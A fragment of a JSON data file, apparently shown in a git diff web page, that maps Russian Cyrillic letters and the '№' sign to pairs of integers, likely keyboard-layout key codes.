"ъ": [
|
||||
0,
|
||||
48
|
||||
],
|
||||
"ф": [
|
||||
0,
|
||||
4
|
||||
],
|
||||
"ы": [
|
||||
0,
|
||||
22
|
||||
],
|
||||
"в": [
|
||||
0,
|
||||
7
|
||||
],
|
||||
"а": [
|
||||
0,
|
||||
4
|
||||
],
|
||||
"п": [
|
||||
0,
|
||||
10
|
||||
],
|
||||
"р": [
|
||||
0,
|
||||
11
|
||||
],
|
||||
"о": [
|
||||
0,
|
||||
13
|
||||
],
|
||||
"л": [
|
||||
0,
|
||||
14
|
||||
],
|
||||
"д": [
|
||||
0,
|
||||
15
|
||||
],
|
||||
"ж": [
|
||||
0,
|
||||
51
|
||||
],
|
||||
"э": [
|
||||
0,
|
||||
52
|
||||
],
|
||||
"я": [
|
||||
0,
|
||||
29
|
||||
],
|
||||
"ч": [
|
||||
0,
|
||||
27
|
||||
],
|
||||
"с": [
|
||||
0,
|
||||
6
|
||||
],
|
||||
"м": [
|
||||
0,
|
||||
25
|
||||
],
|
||||
"и": [
|
||||
0,
|
||||
5
|
||||
],
|
||||
"т": [
|
||||
0,
|
||||
17
|
||||
],
|
||||
"ь": [
|
||||
0,
|
||||
16
|
||||
],
|
||||
"б": [
|
||||
0,
|
||||
54
|
||||
],
|
||||
"ю": [
|
||||
0,
|
||||
55
|
||||
],
|
||||
"ё": [
|
||||
0,
|
||||
53
|
||||
],
|
||||
"№": [
|
||||
2,
|
||||
32
|
||||
]
|
||||
}
|
||||
Some files were not shown because too many files have changed in this diff Show More
Reference in New Issue
Block a user